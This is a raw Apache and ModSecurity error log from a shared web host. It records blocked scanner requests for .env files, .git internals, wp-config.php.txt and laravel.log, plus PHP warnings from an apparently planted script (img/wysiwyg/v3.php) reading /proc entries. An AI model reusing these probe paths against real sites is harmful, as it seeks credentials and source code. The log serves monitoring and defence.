[Tue May 12 02:03:40.654696 2026] [security2:error] [pid 1730175:tid 1730198] [client 49.51.204.74:50224] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rixonephotography.com"] [uri "/"] [unique_id "agJuXHo6NvB9WXx5V-5xcAAAARU"], referer: http://rixonephotography.com
[Tue May 12 02:03:42.979756 2026] [autoindex:error] [pid 1695975:tid 1695980] [client 20.151.0.198:13260] AH01276: Cannot serve directory /home/letamsga/public_html/wp-includes/js/codemirror/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 02:03:48.538231 2026] [autoindex:error] [pid 1707624:tid 1707696] [client 20.151.0.198:35798] AH01276: Cannot serve directory /home/letamsga/public_html/wp-includes/block-patterns/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 02:05:36.736812 2026] [:error] [pid 1707624:tid 1707701] [client 194.163.167.152:52193] File does not exist: /home/totalcloud/public_html/index.php, referer: binance.com
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1899831/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1899831/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1899831/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1899831/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1899831/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1899831/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 02:05:46.366989 2026] [autoindex:error] [pid 1730207:tid 1730218] [client 194.163.167.152:65201] AH01276: Cannot serve directory /home/totalcloud/public_html/.well-known/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: binance.com
PHP Warning:  filesize(): stat failed for /proc/1713/task/1713/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1713/task/1713/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1713/task/1713/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1713/task/1713/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1713/task/1713/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1713/task/1713/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 02:06:27.569269 2026] [autoindex:error] [pid 1707624:tid 1707696] [client 20.151.0.198:35798] AH01276: Cannot serve directory /home/letamsga/public_html/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
PHP Warning:  filesize(): stat failed for /proc/1704342/task/1704347/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704342/task/1704347/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704342/task/1704347/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704342/task/1704347/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704342/task/1704347/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704342/task/1704347/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 02:07:28.829867 2026] [security2:error] [pid 1691274:tid 1691295] [client 34.39.32.34:47448] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecorporatefinance.castiglionecorporatefinance.fr"] [uri "/.git/config"] [unique_id "agJvQFfdQaraX_prmqcWPwAAABM"]
[Tue May 12 02:07:28.830258 2026] [security2:error] [pid 1691274:tid 1691295] [client 34.39.32.34:47448] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecorporatefinance.castiglionecorporatefinance.fr"] [uri "/.git/config"] [unique_id "agJvQFfdQaraX_prmqcWPwAAABM"]
[Tue May 12 02:07:28.831144 2026] [core:error] [pid 1691274:tid 1691295] [client 34.39.32.34:47448] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:07:28.831629 2026] [security2:error] [pid 1691274:tid 1691295] [client 34.39.32.34:47448] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecorporatefinance.castiglionecorporatefinance.fr"] [uri "/.git/config"] [unique_id "agJvQFfdQaraX_prmqcWPwAAABM"]
[Tue May 12 02:07:29.982149 2026] [security2:error] [pid 1691274:tid 1691297] [client 93.123.109.164:7308] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "labaujue.com"] [uri "/.env.local"] [unique_id "agJvQVfdQaraX_prmqcWQQAAABY"]
[Tue May 12 02:07:29.982294 2026] [security2:error] [pid 1691274:tid 1691297] [client 93.123.109.164:7308] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/.env.local"] [unique_id "agJvQVfdQaraX_prmqcWQQAAABY"]
[Tue May 12 02:07:30.626157 2026] [security2:error] [pid 1691274:tid 1691291] [client 93.123.109.164:7366] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/index"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "labaujue.com"] [uri "/.git/index"] [unique_id "agJvQlfdQaraX_prmqcWQgAAAA8"]
[Tue May 12 02:07:30.626629 2026] [security2:error] [pid 1691274:tid 1691291] [client 93.123.109.164:7366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/.git/index"] [unique_id "agJvQlfdQaraX_prmqcWQgAAAA8"]
[Tue May 12 02:07:30.626910 2026] [security2:error] [pid 1730175:tid 1730193] [client 93.123.109.164:7368] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.gitignore found within REQUEST_FILENAME: /.gitignore"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "labaujue.com"] [uri "/.gitignore"] [unique_id "agJvQno6NvB9WXx5V-5ySgAAARA"]
[Tue May 12 02:07:30.627288 2026] [security2:error] [pid 1730175:tid 1730193] [client 93.123.109.164:7368] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/.gitignore"] [unique_id "agJvQno6NvB9WXx5V-5ySgAAARA"]
[Tue May 12 02:07:30.629867 2026] [security2:error] [pid 1709071:tid 1709088] [client 93.123.109.164:7396] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/master"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "labaujue.com"] [uri "/.git/refs/heads/master"] [unique_id "agJvQrvMumyrWMfSu7qgqAAAAME"]
[Tue May 12 02:07:30.629999 2026] [security2:error] [pid 1709071:tid 1709088] [client 93.123.109.164:7396] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/.git/refs/heads/master"] [unique_id "agJvQrvMumyrWMfSu7qgqAAAAME"]
[Tue May 12 02:07:30.633236 2026] [security2:error] [pid 1730207:tid 1730215] [client 93.123.109.164:7356] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "labaujue.com"] [uri "/.git/HEAD"] [unique_id "agJvQjue9Sp-pIv_Bb6GdgAAAUY"]
[Tue May 12 02:07:30.633389 2026] [security2:error] [pid 1730207:tid 1730215] [client 93.123.109.164:7356] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/.git/HEAD"] [unique_id "agJvQjue9Sp-pIv_Bb6GdgAAAUY"]
[Tue May 12 02:07:30.633383 2026] [security2:error] [pid 1730207:tid 1730225] [client 93.123.109.164:7434] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "labaujue.com"] [uri "/wp-config.php.txt"] [unique_id "agJvQjue9Sp-pIv_Bb6GdQAAAVA"]
[Tue May 12 02:07:30.633631 2026] [security2:error] [pid 1730207:tid 1730225] [client 93.123.109.164:7434] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/wp-config.php.txt"] [unique_id "agJvQjue9Sp-pIv_Bb6GdQAAAVA"]
[Tue May 12 02:07:30.633864 2026] [security2:error] [pid 1695975:tid 1696000] [client 93.123.109.164:7420] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "labaujue.com"] [uri "/storage/logs/laravel.log"] [unique_id "agJvQtVI9ymHBxup74-EoAAAAJY"]
[Tue May 12 02:07:30.634121 2026] [security2:error] [pid 1695975:tid 1696000] [client 93.123.109.164:7420] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/storage/logs/laravel.log"] [unique_id "agJvQtVI9ymHBxup74-EoAAAAJY"]
[Tue May 12 02:07:30.634465 2026] [security2:error] [pid 1707624:tid 1707696] [client 93.123.109.164:7326] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env#"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "labaujue.com"] [uri "/.env#"] [unique_id "agJvQrOxS7i6i_mT2NK_JQAAAE4"]
[Tue May 12 02:07:30.634803 2026] [security2:error] [pid 1707624:tid 1707696] [client 93.123.109.164:7326] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/.env#"] [unique_id "agJvQrOxS7i6i_mT2NK_JQAAAE4"]
[Tue May 12 02:07:30.637087 2026] [security2:error] [pid 1730175:tid 1730198] [client 93.123.109.164:7338] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "labaujue.com"] [uri "/.env.txt"] [unique_id "agJvQno6NvB9WXx5V-5ySwAAARU"]
[Tue May 12 02:07:30.637231 2026] [security2:error] [pid 1730175:tid 1730198] [client 93.123.109.164:7338] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/.env.txt"] [unique_id "agJvQno6NvB9WXx5V-5ySwAAARU"]
[Tue May 12 02:07:30.654079 2026] [security2:error] [pid 1709071:tid 1709105] [client 93.123.109.164:7450] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "labaujue.com"] [uri "/.env.production.local"] [unique_id "agJvQrvMumyrWMfSu7qgqQAAANI"]
[Tue May 12 02:07:30.654548 2026] [security2:error] [pid 1709071:tid 1709105] [client 93.123.109.164:7450] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/.env.production.local"] [unique_id "agJvQrvMumyrWMfSu7qgqQAAANI"]
[Tue May 12 02:07:30.654624 2026] [security2:error] [pid 1691274:tid 1691286] [client 93.123.109.164:7362] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/main"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "labaujue.com"] [uri "/.git/refs/heads/main"] [unique_id "agJvQlfdQaraX_prmqcWQwAAAAk"]
[Tue May 12 02:07:30.654814 2026] [security2:error] [pid 1691274:tid 1691286] [client 93.123.109.164:7362] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/.git/refs/heads/main"] [unique_id "agJvQlfdQaraX_prmqcWQwAAAAk"]
[Tue May 12 02:07:30.663943 2026] [security2:error] [pid 1691274:tid 1691279] [client 93.123.109.164:7460] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "labaujue.com"] [uri "/.env.example"] [unique_id "agJvQlfdQaraX_prmqcWRAAAAAI"]
[Tue May 12 02:07:30.664200 2026] [security2:error] [pid 1691274:tid 1691279] [client 93.123.109.164:7460] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/.env.example"] [unique_id "agJvQlfdQaraX_prmqcWRAAAAAI"]
[Tue May 12 02:07:30.720269 2026] [security2:error] [pid 1707624:tid 1707695] [client 93.123.109.164:7370] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "labaujue.com"] [uri "/.git/logs/HEAD"] [unique_id "agJvQrOxS7i6i_mT2NK_JgAAAE0"]
[Tue May 12 02:07:30.730374 2026] [security2:error] [pid 1707624:tid 1707695] [client 93.123.109.164:7370] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/.git/logs/HEAD"] [unique_id "agJvQrOxS7i6i_mT2NK_JgAAAE0"]
[Tue May 12 02:07:30.794638 2026] [security2:error] [pid 1730175:tid 1730183] [client 93.123.109.164:7372] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/commit_editmsg"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "labaujue.com"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agJvQno6NvB9WXx5V-5yTAAAAQY"]
